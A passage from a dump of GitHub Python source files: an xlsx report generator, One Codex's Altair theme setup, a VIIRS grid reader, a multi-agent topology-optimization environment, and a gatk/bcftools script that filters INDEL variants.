f.readlines()]\n\t\t\t\t\t'''\n\t\t\t\t\tOnly one pop() it's because the label of each data will be spilt into two element\n\t\t\t\t\te.g.(100, 1000) => ['(100', '1000)']\n\t\t\t\t\tThe original implementation has only a aplhabet in the beginning of each line of the data\n\t\t\t\t\t'''\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tdata[ii].pop(0)\n\n\t\t\t\t\t# A ~ R\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tsheet[POS(ii+1, 0)] = CH[ii]\n\t\t\t\t\t# description\n\t\t\t\t\tfor ii in range(len(MAP[j])):\n\t\t\t\t\t\tsheet[POS(ii+1, 1)] = MAP[j][ii]\n\t\t\t\t\t# actual data\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tfor jj in range(1, len(data[ii])):\n\t\t\t\t\t\t\t# print('{} {}'.format(ii, jj))\n\t\t\t\t\t\t\tsheet[POS(ii + 1, jj-1 + 2)] = data[ii][jj]\n\t\t\t\t\t# total\n\t\t\t\t\ttotal_pos = 5\n\t\t\t\t\tpercent_pos = [3, 5]\n\t\t\t\t\tif i == 'Alternative':\n\t\t\t\t\t\ttotal_pos = 6\n\t\t\t\t\t\tpercent_pos = [4, 6]\n\t\t\t\t\ttotal_lines = []\n\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tsumm = float(data[ii][1]) + float(data[ii][2]) + float(data[ii][3])\n\t\t\t\t\t\tif i == 'Alternative':\n\t\t\t\t\t\t\tsumm += float(data[ii][4])\n\t\t\t\t\t\ttotal_lines.append(summ)\n\n\t\t\t\t\tfor ii in range(len(total_lines)):\n\t\t\t\t\t\tsheet[POS(ii+1, total_pos)] = total_lines[ii]\n\n\t\t\t\t\t# sort / total\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tsheet[POS(1+ii, total_pos+1)] = '=' + POS(1+ii, percent_pos[0]) + '/' + POS(1+ii, percent_pos[1])\n\t\t\t\t\t\tsheet[POS(1+ii, total_pos+1)].style = 'Percent'\n\t\t\t\t\t\tsheet[POS(1+ii, total_pos+1)].number_format = '00.00%'\n\n\t\t\t\t\tif g_verbose:\n\t\t\t\t\t\tprint('=== test ===')\n\t\t\t\t\t\tfor row in sheet:\n\t\t\t\t\t\t\tfor cel in row:\n\t\t\t\t\t\t\t\tprint(cel.value, end=' ')\n\t\t\t\t\t\t\tprint()\n\t\t\t\t\t\tprint('============')\n\t\t\texcept FileNotFoundError as e:\n\t\t\t\tprint('Warning: {}'.format(e))\n\t\t\t\tpass\n\n\tif not g_dry:\n\t\tprint(wb.sheetnames)\n\t\twb.save('test.xlsx')\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='Process the output time data into xlsx')\n\tparser.add_argument('-o', '--output', metavar='path', help='Set the output path (Default: .)')\n\tparser.add_argument('-i', '--input', metavar='path', help='Set the input data path (Multiple)', nargs='+')\n\tparser.add_argument('--dry', help='Dry run', action='store_true')\n\tparser.add_argument('-V', '--version', action='version', version='%(prog)s 0.0.1')\n\tparser.add_argument('-v', '--verbose', action='store_true', help='Detail output')\n\n\targs = parser.parse_args()\n\n\tflag = True\n\n\tif args.input:\n\t\tgetInputPath(args.input)\n\tif args.output:\n\t\tgetOutputPath(args.output)\n\n\tg_dry = args.dry\n\tg_verbose = args.verbose\n\tif args.input and args.output:\n\t\tprocess()\n\t\tflag = False\n\tif g_verbose:\n\t\tprint('===== test ======')\n\t\tprint('args.dry = {}'.format(args.dry))\n\t\tprint('args.o = {}'.format(args.output))\n\t\tprint('arg.i = {}'.format(args.input))\n\t\tprint()\n\tif flag:\n\t\tparser.print_usage()","repo_name":"roy4801/107_Gernic_Programming","sub_path":"lab01/gen_xlsx.py","file_name":"gen_xlsx.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12387102567","text":"import imp\nimport sys\n\nfrom onecodex.viz._heatmap import VizHeatmapMixin\nfrom onecodex.viz._pca import VizPCAMixin\nfrom onecodex.viz._primitives import dendrogram\nfrom onecodex.viz._metadata import VizMetadataMixin\nfrom onecodex.viz._distance import VizDistanceMixin\nfrom onecodex.viz._bargraph import VizBargraphMixin\nfrom onecodex.viz._functional import VizFunctionalHeatmapMixin\n\n\nOCX_DARK_GREEN = \"#128887\"\n\nDEFAULT_PALETTES = {\n \"ocx\": [\n \"#16347B\",\n \"#0072C7\",\n \"#01ACEC\",\n \"#97E9FC\",\n \"#0A605E\",\n \"#1DA893\",\n \"#3DD8BE\",\n \"#ABEFE2\",\n \"#37257D\",\n \"#9C78E0\",\n \"#CBC0F9\",\n \"#E3DDFF\",\n \"#BC5B00\",\n \"#EB984A\",\n \"#FCE34D\",\n \"#FEF2A3\",\n \"#950303\",\n \"#DD3A3A\",\n \"#FF8D8B\",\n \"#FFD5CB\",\n \"#771354\",\n \"#C13A8B\",\n \"#F28BBF\",\n \"#F9D9E7\",\n ],\n \"tableau10\": [\n \"#4e79a7\",\n \"#f28e2b\",\n \"#e15759\",\n \"#76b7b2\",\n \"#59a14f\",\n \"#edc948\",\n \"#b07aa1\",\n \"#ff9da7\",\n \"#9c755f\",\n \"#bab0ac\",\n ],\n}\n\nVEGAEMBED_OPTIONS = {\n \"mode\": \"vega-lite\",\n \"loader\": {\"target\": \"_blank\", \"http\": {\"credentials\": \"same-origin\"}},\n \"logLevel\": \"error\",\n}\n\n\ndef onecodex_theme():\n onecodex_palette = [\"#ffffcc\", \"#c7e9b4\", \"#7fcdbb\", \"#41b6c4\", \"#2c7fb8\", \"#264153\"]\n\n font_family = \"Fira Sans, Helvetica\"\n\n return {\n \"config\": {\n \"range\": {\n \"heatmap\": list(reversed(onecodex_palette)),\n \"category\": DEFAULT_PALETTES[\"ocx\"],\n \"ramp\": list(reversed(onecodex_palette)),\n },\n \"area\": {\"fill\": OCX_DARK_GREEN},\n \"bar\": {\"fill\": OCX_DARK_GREEN},\n \"mark\": {\"color\": OCX_DARK_GREEN},\n \"axis\": {\n \"labelFont\": font_family,\n \"labelFontSize\": 12,\n \"titleFont\": font_family,\n \"titleFontSize\": 12,\n \"grid\": False,\n },\n \"legend\": {\n \"labelFont\": font_family,\n \"labelFontSize\": 12,\n \"titleFont\": font_family,\n \"titleFontSize\": 12,\n },\n \"title\": {\"font\": font_family},\n \"view\": {\"width\": 400, \"height\": 400, \"strokeWidth\": 0},\n \"background\": \"white\",\n }\n }\n\n\ndef configure_onecodex_theme(altair_module=None):\n \"\"\"Configure One Codex Altair theme.\"\"\"\n if altair_module is None:\n try:\n import altair\n\n altair_module = altair\n except ImportError:\n return # noop\n\n altair_module.themes.register(\"onecodex\", onecodex_theme)\n altair_module.themes.enable(\"onecodex\")\n\n # Render using `altair_saver` if installed (report environment only, requires node deps)\n if \"altair_saver\" in altair_module.renderers.names():\n import functools\n import shutil\n import altair_saver.savers._node\n from altair_saver._utils import check_output_with_stderr\n\n # Change `npm bin` to `npm root` for compatibility with npm >=9 (also backwards compatible\n # with npm 8). We are monkeypatching because altair-saver appears to be an unmaintained\n # project. We are pinned at v0.5.0 so this hack should be safe.\n #\n # Function copied and modified from:\n # https://github.com/altair-viz/altair_saver/blob/v0.5.0/altair_saver/savers/_node.py#L15-L24\n #\n # Applied the fix from:\n # https://github.com/altair-viz/altair_saver/pull/116\n #\n # altair-saver is BSD-3-Clause:\n # https://github.com/altair-viz/altair_saver/blob/v0.5.0/LICENSE\n #\n # altair-saver license is included with this software in `licenses/altair-saver.txt`\n @functools.lru_cache(2)\n def npm_bin(global_: bool) -> str:\n \"\"\"Locate the npm binary directory.\"\"\"\n npm = shutil.which(\"npm\")\n if not npm:\n raise altair_saver.savers._node.ExecutableNotFound(\"npm\")\n cmd = [npm, \"root\"]\n if global_:\n cmd.append(\"--global\")\n return check_output_with_stderr(cmd).decode().strip()\n\n altair_saver.savers._node.npm_bin = npm_bin\n\n # Filter out vega-lite warning about boxplots not yet supporting selection (DEV-4237). This\n # can be removed when vega-lite adds selection support to boxplots:\n #\n # - https://github.com/vega/vega-lite/issues/3702\n # - https://github.com/altair-viz/altair/issues/2232\n def stderr_filter(line):\n \"\"\"Return ``True`` if stderr line should be displayed.\"\"\"\n return \"Selection not supported for boxplot yet\" not in line\n\n altair_module.renderers.enable(\n \"altair_saver\",\n fmts=[\"html\", \"svg\"],\n embed_options=VEGAEMBED_OPTIONS,\n vega_cli_options=[\"--loglevel\", \"error\"],\n stderr_filter=stderr_filter,\n )\n else:\n altair_module.renderers.enable(\"html\", embed_options=VEGAEMBED_OPTIONS)\n\n\n# Define an import hook to configure Altair's theme and renderer the first time\n# it is imported. Directly importing and configuring Altair in this subpackage\n# can slow down the API and CLI. An import hook avoids this performance hit by\n# configuring Altair during deferred import in visualization code.\n#\n# Note: this code is currently Python 2/3 compatible by using the `imp`\n# package, which is deprecated in Python 3. Consider using `importlib` if this\n# subpackage doesn't need to support Python 2.\n#\n# Based on: https://stackoverflow.com/a/60352956/3776794\nclass _AltairImportHook(object):\n def find_module(self, fullname, path=None):\n if fullname != \"altair\":\n return None\n self.module_info = imp.find_module(fullname, path)\n return self\n\n def load_module(self, fullname):\n \"\"\"Load Altair module and configure its theme and renderer.\"\"\"\n previously_loaded = fullname in sys.modules\n altair = imp.load_module(fullname, *self.module_info)\n\n if not previously_loaded:\n self._configure_altair(altair)\n return altair\n\n def _configure_altair(self, altair):\n configure_onecodex_theme(altair)\n\n\nsys.meta_path = [_AltairImportHook()] + sys.meta_path\n\n__all__ = [\n \"VizPCAMixin\",\n \"VizHeatmapMixin\",\n \"VizMetadataMixin\",\n \"VizDistanceMixin\",\n \"dendrogram\",\n \"VizBargraphMixin\",\n \"VizFunctionalHeatmapMixin\",\n]\n","repo_name":"onecodex/onecodex","sub_path":"onecodex/viz/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"42915102875","text":"import matplotlib.pyplot as plt\nfrom matplotlib import colors, ticker, cm\nimport matplotlib as mpl #Loads map plotting library\nimport numpy as np #Loads functions for array, linear algebra, array operations\nimport glob\nimport gc\nimport datetime\nfrom matplotlib.dates import DayLocator, HourLocator, DateFormatter, drange\n#import json\n\nfiles = glob.glob('/media/Disk3T/Team/dwu/viirs/data/subset_gd/cf/*asc')\n#fname = '/home/di/viirs/data/SVDNB_npp_20151201-20151231_00N060W_vcmcfg_v10_c201601251413.avg_rade9.tif'\nfiles=sorted(files)\n\n#files_cf = glob.glob('/media/Disk3T/Team/dwu/viirs/data/subset_gd/cf/*asc')\n#files_cf=sorted(files_cf)\n\ntime_t=[]\ncf_t=[]\nfor f in files:\n\n\tfname = f\n\tprint(f)\n\n\ttemp=fname.split('_')\n\ttemp1=temp[3]\n\tyear=temp1[2:4]\n\tmon=temp1[4:6]\n\ttime_t.append(year+'/'+mon)\n\t#time='20151201-20151231'\n\tftype='light'\n\t#outpath='/media/Disk3T/Team/dwu/viirs/img/subset_gd/'\n\t#outname=outpath+ftype+'_'+time+'_sub_org.png'\n\n\tfi=open(fname,'r')\n\theader1 = fi.readline()\n\theader2 = fi.readline()\n\theader3 = fi.readline()\n\theader4 = fi.readline()\n\theader5 = fi.readline()\n\n\ttemp = header1.strip()\n\ttemp1 = temp.split()\n\tncols = int(temp1[1])\n\n\ttemp = header2.strip()\n\ttemp1 = temp.split()\n\tnrows = int(temp1[1])\n\n\ttemp = header3.strip()\n\ttemp1 = temp.split()\n\txllcorner = float(temp1[1])\n\n\ttemp = header4.strip()\n\ttemp1 = temp.split()\n\tyllcorner = float(temp1[1])\n\n\ttemp = header5.strip()\n\ttemp1 = temp.split()\n\tcellsize = float(temp1[1])\n\n\txurcorner = xllcorner+(ncols-1)*cellsize\n\tyurcorner = yllcorner+(nrows-1)*cellsize\n\t#lon0=np.arange(xllcorner,xurcorner,cellsize)\n\t#lat0=np.arange(yllcorner,yurcorner,cellsize)\n\tlon0=xllcorner+np.arange(ncols)*cellsize\n\tlat0=yllcorner+np.arange(nrows)*cellsize\n\n\tlat0 = lat0[::-1]\n\n\tlons, lats = np.meshgrid(lon0, lat0)\n\n\tdata=[]\n\n\ti = 0\n\tfor line in fi:\n\t\ti = i+1\n\t\tline = line.strip()\n\t\tcolumns = line.split()\n\t\tsource = np.float_(columns)\n\t\tdata.append(source)\n\n\tfi.close()\n\n\tdata=np.asarray(data)\n\n\t#dd=np.where(data>10)\n\tcf_t.append(np.mean(data))\n\nfdata={'cf_t':cf_t,'time_t':time_t}\n#with open('data.txt','w') as outfile:\n#\tjson.dump(fdata,outfile)\n\n#fdata={'data':data}\nnp.save('cf.npy',fdata)\n\n#read_dict=np.load('my_file.npy').item()\n#data_sav=read_dict['data']\n\n#date1 = datetime.datetime(2014, 1, 1)\n#date2 = datetime.datetime(2016, 1, 1)\n#delta = datetime.timedelta(weeks=4)\n#dates = drange(date1, date2, delta)\nexit()\nx = range(len(time_t))\n\nwith plt.style.context('fivethirtyeight'):\n plt.plot(x, light_t)\n plt.plot(x, ct_t)\n\nprint(light_t)\nprint(ct_t)\n#line, = plt.plot(x, y, '--', linewidth=2)\n\nplt.show()\n\n","repo_name":"karrey05/Team","sub_path":"viirs/timeses/read_asc_cf.py","file_name":"read_asc_cf.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9509391507","text":"'''\nClass env_ke provide objects for buiding environments, which load and agent\ntopology optimization by MAS\n\n2D only for now\n'''\nimport time\nimport numpy as np\nimport math\nfrom scipy.sparse import coo_matrix\n\nimport suFuncStack \nfrom suAI.misc import debug\nfrom suAI.mas import agent\nfrom suAI.misc import Qtrac\nfrom suAI.ke.ke import KnowledgeEngineBase\nfrom pyknow import *\n\nimport concurrent.futures\n\nfrom random import choice\nif __name__ == \"__main__\":\n from loads import HalfBeam\n from constraints import DensityConstraint\n from fesolvers import LilFESolver, CooFESolver \n \n \n \n\n\n####################\n# ActionPool # \n#################### \nclass ActionPool(object):\n def __init__(self):\n pass\n def set_parent(self, parent):\n self.parent = parent\n def add_func(self, func):\n f = classmethod(func)\n setattr(self, 'ACT_'+func.__name__, func)\n def get_acts(self):\n func_list = dir(self)\n func_list = [i for i in func_list if i[:4]==\"ACT_\"]\n return func_list\n def run(self, method_name, pos):\n return getattr(self, \"ACT_\"+method_name)(pos) \n \n####################\n# Actions # \n#################### \n# action: to be added into ActionPool()\ndef increase_density(x): \n move = 0.03 \n xnew = x + move \n xnew = np.maximum(0, np.minimum(1.0, xnew)) \n return xnew\n \n# action: to be added into ActionPool()\ndef decrease_density(x): \n move = 0.03 \n xnew = x - move \n xnew = np.maximum(0, np.minimum(1.0, xnew)) \n return xnew\n\n##########\n# KE #\n##########\nclass ke_mas(KnowledgeEngineBase, KnowledgeEngine):\n ''' \n 1. Hold an knowlege base (eg. rules and facts) for MAS based evolution\n 2. Help agents to make a decision.\n '''\n def __init__(self):\n KnowledgeEngineBase.__init__(self)\n KnowledgeEngine.__init__(self)\n \n def reset(self):\n super().reset()\n self.answers = []\n \n @DefFacts()\n def __init_facts(self):\n yield(Fact(method='mas'))\n return\n \n ## dc > 0.4 -> \n @Rule (Fact(dc = MATCH.dc),\n TEST(lambda dc: dc > 0.4)\n )\n def increase_density(self):\n self.answers.append('increase_density')\n \n @Rule (Fact(dc = MATCH.dc),\n TEST(lambda dc: dc <= 0.4)\n )\n def decrease_density(self):\n self.answers.append('decrease_density')\n \n def add_facts(self, facts):\n self.declare(*facts)\n \n \n def status(self):\n print(self.facts)\n\n\n###################################################\n# Global variable for parallel computing #\n###################################################\nenv = None\nacts = None\n\nacts = ActionPool()\nacts.add_func(decrease_density)\nacts.add_func(increase_density) \n\n\ndef timer(func):\n def wraper(*args, **kargs):\n start_time = time.perf_counter()\n f = func(*args, **kargs)\n end_time = time.perf_counter()\n print('Done in {} seconds'.format(end_time - start_time)) \n return f\n return wraper\n\n# parallel processing method \ndef col_agents_act(col_idx, col_x, col_dc):\n '''\n Deal with each sub columns\n ''' \n ke = ke_mas()\n for i in range(len(col_x)): \n f = Fact(dc = float(col_dc[i]))\n fs = []\n fs.append(f)\n ke.reset()\n ke.add_facts(fs) \n ke.run()\n for func in ke.answers:\n col_x[i] = acts.run(func,col_x[i]) \n \n return col_idx, col_x\n\ndef update_parallel(env, constraint):\n #volfrac = constraint.volume_frac()\n #env.xmin = constraint.density_min()\n #env.xmax = constraint.density_max() \n \n futures = set() \n data = []\n with concurrent.futures.ProcessPoolExecutor(max_workers=8) as executor:\n for idx_col, col_x, col_dc in get_jobs(env):\n future = executor.submit(col_agents_act, idx_col, col_x, col_dc) \n futures.add(future)\n data = wait_for(futures, env)\n \n return env.combine_data(data)\n\ndef get_jobs(env):\n dc_cols = env.divide_data(env.dc)\n x_cols = env.divide_data(env.x)\n for idx_col in range(len(dc_cols)):\n yield idx_col, x_cols[idx_col].flatten(), dc_cols[idx_col].flatten()\n\n\ndef wait_for(futures, env):\n canceled = False \n data = {}\n for future in concurrent.futures.as_completed(futures):\n err = future.exception()\n if err is None:\n result = future.result()\n #col_idx_arr += [result.col_idx]\n #ata += result.col_data\n data[result[0]] = result[1]\n #print(result)\n \n elif isinstance(err, TypeError):\n Qtrac.report(str(err), True)\n else:\n raise err # Unanticipated\n return data \n\n###################\n# Environment #\n################### \nclass Environment(object):\n \n '''\n young: young's modulus\n poisson: poisson ratio\n '''\n def __init__(self, fesolver, young = 1, poisson = 0.3, verbose = False):\n self.convergence = suFuncStack.convergence(3)\n self.fesolver = fesolver\n self.young = young\n self.poisson = poisson\n self.dim = 2\n self.verbose = verbose\n self.x = []\n self.agts = {}\n self.func_pool = ActionPool()\n self.func_pool.set_parent(self) \n \n # test action adding \n self.func_pool.add_func(decrease_density)\n self.func_pool.add_func(increase_density) \n \n def divide_data(self, m):\n '''\n dividing matrix into columns\n return list of np.ndarray\n '''\n nely, nelx = m.shape\n X = np.split(m, nelx, axis=1)\n return X\n \n def combine_data(self, data):\n '''\n combining columns into matrix\n notice the input col in data is 1d array\n '''\n if len(data) < 1:\n return []\n m = np.vstack(data[0])\n \n for i in range(1,len(data)):\n m = np.concatenate((m, np.vstack(data[i]) ), axis=1)\n \n return m\n \n def run(self, load, constraint, x, penal, rmin, delta, loopy, history = False): \n loop = 0 # number of loop iterations\n change = 1.0 # maximum density change from prior iteration\n self.load = load\n self.constraint = constraint\n self.convergence.add_data(x)\n self.H, self.Hs = self.pre_filter(x, rmin)\n \n if history:\n x_history = [x.copy()]\n\n while (not self.convergence.is_convergence()) and (loop < loopy):\n loop = loop + 1\n x, u = self.iter(load, constraint, x, penal, rmin) \n self.convergence.add_data(x)\n if self.verbose: print('iteration ', loop, ', change ', self.convergence.listy[-1], flush = True)\n if history: x_history.append(x.copy())\n \n if history:\n return x, x_history\n else:\n return x, loop\n \n # initialization\n def init(self, load, constraint):\n (nelx, nely) = load.shape()\n # mean density\n self.x = np.ones((nely, nelx))*constraint.volume_frac() \n \n return self.x\n\n # iteration\n def iter(self, load, constraint, x, penal, rmin):\n\n xold = x.copy()\n\n # element stiffness matrix\n ke = self.lk(self.young, self.poisson)\n\n # displacement via finite element analysis\n u = self.fesolver.displace(load, x, ke, penal)\n\n # compliance and derivative\n c, dc = self.comp(load, x, u, ke, penal)\n\n # filter\n #dc = self.filt(x, rmin, dc)\n self.dc = self.fast_filt(x,dc,self.H, self.Hs)\n # update\n x = self.update(x, constraint)\n\n # how much has changed?\n change = np.amax(abs(x-xold))\n return x, u\n \n # compliance and its derivative\n def comp(self, load, x, u, ke, penal):\n c = 0\n dc = np.zeros(x.shape)\n\n nely, nelx = x.shape\n for ely in range(nely):\n for elx in range(nelx):\n ue = u[load.edofOld(elx, ely, nelx, nely)]\n ce = np.dot(ue.transpose(), np.dot(ke, ue))\n c = c + (x[ely,elx]**penal)*ce\n dc[ely,elx] = -penal*(x[ely,elx]**(penal-1))*ce\n\n return c, dc\n\n def pre_filter(self, x, rmin):\n rminf = round(rmin)\n nely, nelx = x.shape\n nfilter=int(nelx * nely * ((2 * rminf + 1)** 2)) \n iH = np.zeros(nfilter)\n jH = np.zeros(nfilter)\n sH = np.zeros(nfilter)\n cc = 0\n for i in range(nelx):\n for j in range(nely):\n row=i*nely+j #index order is the same as that for elements \n for k in range(max(i-rminf, 0), min(i+rminf+1, nelx)):\n for l in range(max(j-rminf, 0), min(j+rminf+1, nely)): \n col = k*nely+l #index order is the same as that for elements\n weight = max(0, rmin - np.sqrt((i-k)**2+(j-l)**2));\n iH[cc] = row\n jH[cc] = col\n sH[cc] = weight\n cc += 1\n H=coo_matrix((sH,(iH,jH)),shape=(nelx*nely,nelx*nely)).todense()\n Hs = H.sum(1) \n \n return H, Hs\n \n def fast_filt(self,x, dc, H, Hs): \n nely,nelx = x.shape\n s = nely*nelx\n x_col = x.flatten('F').reshape([s,1]) \n dc_col = dc.flatten('F').reshape([s,1])\n \n xdc = x_col * dc_col \n dcf = np.dot(H,xdc)/np.multiply(Hs, x_col)\n dc = dcf.reshape([nely,nelx], order='F')\n return dc\n \n # filter\n def filt(self, x, rmin, dc):\n rminf = round(rmin)\n\n dcn = np.zeros(x.shape)\n nely, nelx = x.shape\n\n for i in range(nelx):\n for j in range(nely):\n sum = 0.0\n for k in range(max(i-rminf, 0), min(i+rminf+1, nelx)):\n for l in range(max(j-rminf, 0), min(j+rminf+1, nely)):\n weight = max(0, rmin - math.sqrt((i-k)**2+(j-l)**2));\n sum = sum + weight;\n dcn[j,i] = dcn[j,i] + weight*x[l,k]*dc[l,k];\n \n dcn[j,i] = dcn[j,i]/(x[j,i]*sum);\n\n return dcn\n \n \n def update(self, x, constraint):\n self.x = x \n m = np.abs(self.dc)\n m = m / np.max(m)\n self.dc = np.asarray(m)\n \n x = update_parallel(self, constraint) \n \n return x\n \n \n # element (local) stiffness matrix\n def lk(self, young, poisson):\n e = young\n nu = poisson\n k = np.array([1/2-nu/6,1/8+nu/8,-1/4-nu/12,-1/8+3*nu/8,-1/4+nu/12,-1/8-nu/8,nu/6,1/8-3*nu/8])\n ke = e/(1-nu**2)* \\\n np.array([ [k[0], k[1], k[2], k[3], k[4], k[5], k[6], k[7]],\n [k[1], k[0], k[7], k[6], k[5], k[4], k[3], k[2]],\n [k[2], k[7], k[0], k[5], k[6], k[3], k[4], k[1]],\n [k[3], k[6], k[5], k[0], k[7], k[2], k[1], k[4]],\n [k[4], k[5], k[6], k[7], k[0], k[1], k[2], k[3]],\n [k[5], k[4], k[3], k[2], k[1], k[0], k[7], k[6]],\n [k[6], k[3], k[4], k[1], k[2], k[7], k[0], k[5]],\n [k[7], k[2], k[1], k[4], k[3], k[6], k[5], k[0]] ]);\n\n return ke\n\n\n\n\n \nif __name__ == \"__main__\": \n \n # loading/problem\n nelx = 15\n nely = 5\n penal = 3.0\n rmin = 7.5\n\n delta = 0.02\n loopy = 10#math.inf \n load = HalfBeam(nelx, nely)\n\n # parallel optimizer testing\n verbose = True\n fesolver = CooFESolver(verbose = verbose)\n \n optimizer = None\n density_constraint = None \n \n # material properties\n young = 1\n poisson = 0.6 \n \n optimizer = Environment(fesolver, young, poisson, verbose = verbose)\n # constraints\n density_constraint = DensityConstraint(volume_frac = 1.0, density_min = 0, density_max = 1) \n \n # statistic time\n start_time = time.perf_counter()\n # compute\n history = True\n x = optimizer.init(load, density_constraint)\n x, x_more = optimizer.run(load, density_constraint, x, penal, rmin, delta, loopy, history)\n end_time = time.perf_counter()\n print('Processed {} elements in {} seconds'.format(nelx*nely, end_time - start_time)) \n \n \n \n \n \n","repo_name":"fly2mars/suMasTo","sub_path":"src/env_ke_parallel.py","file_name":"env_ke_parallel.py","file_ext":"py","file_size_in_byte":12582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28820589462","text":"#George Marchment + Clemence Sebe\n#Script Filtration INDEL\nimport os\nimport variables as v\n\n\n#Function that extrats the INDELs and filters them using the filters set in main.py\ndef mainFiltrationINDEL(telechargementFiltreINDEL, sansFiltre, avecFiltre, filtre):\n\tprint(\"DEBUT SCRIPT FILTRATION INDEL\")\n\tcurrent_path= os.getcwd()\n\t\n #We recuperate the filters\n\tqd= filtre['QD'][1]\n\tmq= filtre['MQ'][1]\n\tmqRankSumInf= filtre['MQRankSumInf'][1]\n\tmqRankSumSup= filtre['MQRankSumSup'][1]\n\treadPosRankSumInf= filtre['ReadPosRankSumInf'][1]\n\treadPosRankSumSup= filtre['ReadPosRankSumSup'][1]\n\tsor= filtre['SOR'][1]\n\n\t#We recuperate the comparaisons symbols for the filters \n\tsym_qd= filtre['QD'][0]\n\tsym_mq= filtre['MQ'][0]\n\tsym_mqRankSumInf= filtre['MQRankSumInf'][0]\n\tsym_mqRankSumSup= filtre['MQRankSumSup'][0]\n\tsym_readPosRankSumInf= filtre['ReadPosRankSumInf'][0]\n\tsym_readPosRankSumSup= filtre['ReadPosRankSumSup'][0]\n\tsym_sor= filtre['SOR'][0]\n \n\t#We set the filters to give to gatk VariantFiltration\n\tfiltre_qd= \" --filter-name \\'QD\"+str(qd)+\"\\' --filter-expression \\\"QD\"+sym_qd+str(qd)+\"\\\"\"\n\tfiltre_mq= \" --filter-name \\'MQ\"+str(mq)+\"\\' --filter-expression \\\"MQ\"+sym_mq+str(mq)+\"\\\"\"\n\tfiltre_mqRankSumInf= \" --filter-name \\'MQRankSumInf\"+str(mqRankSumInf)+\"\\' --filter-expression \\\"MQRankSumInf\"+sym_mqRankSumInf+str(mqRankSumInf)+\"\\\"\"\n\tfiltre_mqRankSumSup= \" --filter-name \\'MQRankSumSup\"+str(mqRankSumSup)+\"\\' --filter-expression \\\"MQRankSumSup\"+sym_mqRankSumSup+str(mqRankSumSup)+\"\\\"\"\n\tfiltre_readPosRankSumInf= \" --filter-name \\'ReadPosRankSumInf\"+str(readPosRankSumInf)+\"\\' --filter-expression \\\"ReadPosRankSumInf\"+sym_readPosRankSumInf+str(readPosRankSumInf)+\"\\\"\"\n\tfiltre_readPosRankSumSup= \" --filter-name \\'ReadPosRankSumSup\"+str(readPosRankSumSup)+\"\\' --filter-expression \\\"ReadPosRankSumSup\"+sym_readPosRankSumSup+str(readPosRankSumSup)+\"\\\"\"\n\tfiltre_sor= \" --filter-name \\'SOR\"+str(sor)+\"\\' --filter-expression \\\"SOR\"+sym_sor+str(sor)+\"\\\"\"\n\t\n\tfiltres= filtre_qd+ filtre_mq+ filtre_mqRankSumInf+ filtre_mqRankSumSup+ filtre_readPosRankSumInf+ filtre_readPosRankSumSup+ filtre_sor\n\n\tif telechargementFiltreINDEL:\n\t\t#We select the INDELs \n\t\tcmd = \"gatk SelectVariants -R \" + v.geneRefDossier + \"S288C_reference_sequence_R64-2-1_20150113.fasta\" + \" -V \" + v.vcf + \"output.vcf.gz --select-type-to-include INDEL -O \" + v.vcf + \"INDEL/outputINDEL.vcf.gz\"\n\t\tos.system(cmd)\n\t\t\n\t\t#Without Filter\n\t\tif(sansFiltre):\n\t\t\t#Extract the data wanted (POS, QD ect..)\n\t\t\tcmd = \"bcftools query \" + v.vcf + \"INDEL/outputINDEL.vcf.gz -f '%CHROM\\t%POS\\t%REF\\t%ALT\\t%QD\\t%FS\\t%MQ\\t%MQRankSum\\t%ReadPosRankSum\\t%SOR\\t%DP\\t%FILTER\\n' > \" + v.vcf + \"INDEL/PRE_FILTRE/outputIndelNoFiltrer.txt\"\n\t\t\tos.system(cmd)\n \n\t\t\t#Addition legend to the first line \n\t\t\tcmd = \"sed -i '1iCHROM\\tPOS\\tREF\\tALT\\tQD\\tFS\\tMQ\\tMQRankSum\\tReadPosRankSum\\tSOR\\tDP\\tFILTER\\n' \" + v.vcf + \"INDEL/PRE_FILTRE/outputIndelNoFiltrer.txt\"\n\t\t\tos.system(cmd)\t\n\n\t\t#With filter\n\t\tif(avecFiltre):\n \t\t#Set filters\n\t\t\tcmd = \"gatk VariantFiltration -R \" + v.geneRefDossier + \"S288C_reference_sequence_R64-2-1_20150113.fasta -V \" + v.vcf + \"INDEL/outputINDEL.vcf.gz -O \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.vcf.gz\"+filtres\n\t\t\tos.system(cmd)\n\t\t\t\n\t\t\t#Extract the data wanted (POS, QD ect..)\n\t\t\tcmd = \"bcftools query \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.vcf.gz -f '%CHROM\\t%POS\\t%REF\\t%ALT\\t%QD\\t%FS\\t%MQ\\t%MQRankSum\\t%ReadPosRankSum\\t%SOR\\t%DP\\t%FILTER\\n' > \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.txt\"\n\t\t\tos.system(cmd)\t\n\t\t\t\n\t\t\t#Addition legend to the first line \n\t\t\tcmd = \"sed -i '1iCHROM\\tPOS\\tREF\\tALT\\tQD\\tFS\\tMQ\\tMQRankSum\\tReadPosRankSum\\tSOR\\tDP\\tFILTER' \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.txt\"\n\t\t\tos.system(cmd)\n\n\t\t\n\tprint(\"FIN SCRIPT FILTRATION INDEL\")\n","repo_name":"George-Marchment/Projet-Bioinformatique-L3","sub_path":"filtrationINDEL.py","file_name":"filtrationINDEL.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22442397797","text":"#\n# [79] Word Search\n#\n# https://leetcode.com/problems/word-search/description/\n#\n# algorithms\n# Medium (29.55%)\n# Total Accepted: 